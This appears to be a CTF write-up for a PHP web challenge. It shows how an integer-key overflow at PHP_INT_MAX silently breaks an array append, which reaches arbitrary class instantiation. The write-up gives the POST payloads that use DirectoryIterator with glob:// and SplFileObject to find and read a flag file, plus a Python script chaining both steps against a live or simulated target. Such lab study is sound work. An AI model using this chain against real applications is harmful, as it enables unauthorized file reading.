Passing ?source via GET makes the page print its own source code:
<?php
error_reporting(0);
if(isset($_GET['source'])){
    highlight_file(__FILE__);
    echo "\$flag_filename = 'flag'.md5(???).'php';"; // the flag file is named flag + some md5 + .php
    die();
}
if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c'])){
    $c = $_POST['c'];
    $count[++$c] = 1;   // key is assigned after the increment; if we make the key overflow, the append below fails
    if($count[] = 1) {
        $count[++$c] = 1;
        print_r($count);
        die();
    }else{
        $a = $_POST['a'];
        $b = $_POST['b'];
        echo new $a($b);
    }
}
Send c=9223372036854775806 (PHP_INT_MAX - 1). ++$c then lands exactly on PHP_INT_MAX, so $count[++$c] = 1 occupies the largest possible integer key; the following $count[] = 1 has no next index to use, only emits a warning (silenced by error_reporting(0)) and evaluates to a falsy value, so control falls into the else branch and reaches echo new $a($b). That is not command execution, but it lets us instantiate any PHP built-in class with a chosen constructor argument, which is enough to list and read files. Caveat: this relies on the append failure being a suppressed warning; PHP 8 promoted "Cannot add element to the array as the next element is already occupied" to a thrown Error, so the else branch would never be reached there.
Locate the flag file (POST body; echo on a DirectoryIterator prints the first matching filename via __toString, and glob:// lets us pattern-match the name):
a=DirectoryIterator&b=glob://flag[a-z0-9]*.php&c=9223372036854775806
Read the flag (echo on an SplFileObject prints the current, i.e. first, line of the file, so this only works when the flag sits on line one):
a=SplFileObject&b=flag56ea8b83122449e814e0fd7bfb5f220a.php&c=9223372036854775806
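The two-step chain as one script, added here as an example and not part of the original write-up. It builds the same POST bodies as above, and ships a constructed stand-in for the vulnerable handler (fake_target) that mirrors the PHP control flow (key overflow, glob:// DirectoryIterator, SplFileObject first line) so the chain can be exercised offline; send_post is the real transport for a live target and the target URL, directory listing and flag contents used in the demo are assumptions.

```python
import fnmatch
import urllib.parse
import urllib.request

PHP_INT_MAX = 2**63 - 1  # 9223372036854775807 on 64-bit PHP builds


def overflow_key() -> str:
    # PHP_INT_MAX - 1: ++$c lands exactly on PHP_INT_MAX, so $count[++$c] = 1
    # occupies the last usable integer key and the later $count[] = 1 has no
    # next index. With error_reporting(0) the warning is swallowed and the
    # if() falls through to the else branch that runs `echo new $a($b)`.
    return str(PHP_INT_MAX - 1)


def find_payload(pattern: str = "flag[a-z0-9]*.php") -> dict:
    # DirectoryIterator accepts glob:// paths; echo prints the first match.
    return {"a": "DirectoryIterator", "b": "glob://" + pattern, "c": overflow_key()}


def read_payload(filename: str) -> dict:
    # echo on SplFileObject prints the current (first) line of the file.
    return {"a": "SplFileObject", "b": filename, "c": overflow_key()}


def send_post(url: str, data: dict) -> str:
    # Real transport for a live target (URL is hypothetical; not used offline).
    body = urllib.parse.urlencode(data).encode()
    with urllib.request.urlopen(url, body, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def fake_target(data: dict, files: dict) -> str:
    """Constructed stand-in for the PHP handler. `files` maps filename -> contents.
    Only integer keys are modelled; ++ on a string equal to PHP_INT_MAX would
    produce a float in PHP, which this stand-in does not emulate."""
    c = int(data["c"])
    if c >= PHP_INT_MAX:
        raise ValueError("stand-in models integer keys up to PHP_INT_MAX - 1 only")
    c += 1                          # $count[++$c] = 1
    count = {c: 1}
    if c + 1 <= PHP_INT_MAX:        # $count[] = 1 succeeds -> print_r path, nothing instantiated
        count[c + 1] = 1            # the append and the second $count[++$c] hit the same key
        rows = "".join(f"    [{k}] => {v}\n" for k, v in count.items())
        return "Array\n(\n" + rows + ")\n"
    # Append failed: else branch, `echo new $a($b)`.
    a, b = data["a"], data["b"]
    if a == "DirectoryIterator" and b.startswith("glob://"):
        matches = sorted(fnmatch.filter(files, b[len("glob://"):]))
        return matches[0] if matches else ""
    if a == "SplFileObject":
        return files[b].split("\n", 1)[0]
    raise ValueError("stand-in only models the two classes used in the write-up")


def run_chain(post) -> tuple:
    # `post` takes the form dict and returns the response body.
    # Step 1: find the flag file; step 2: read its first line.
    name = post(find_payload()).strip()
    if not name:
        raise RuntimeError("no file matched the glob pattern")
    return name, post(read_payload(name)).strip()


if __name__ == "__main__":
    # Constructed directory listing and flag value for the offline demo.
    demo_files = {
        "index.php": "<?php error_reporting(0);\n",
        "flag56ea8b83122449e814e0fd7bfb5f220a.php": "flag{constructed_example}\n",
    }
    print(run_chain(lambda d: fake_target(d, demo_files)))
    # Live target (hypothetical URL):
    # print(run_chain(lambda d: send_post("http://target/index.php", d)))
```

The stand-in also shows the negative case: any c whose increment stays below PHP_INT_MAX takes the print_r branch and never instantiates a class, which is why the exact value PHP_INT_MAX - 1 matters.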
Tags: 9223372036854775806, 王杯, flag, CTF, easyweb, php
Source: https://www.cnblogs.com/kode00/p/17750349.html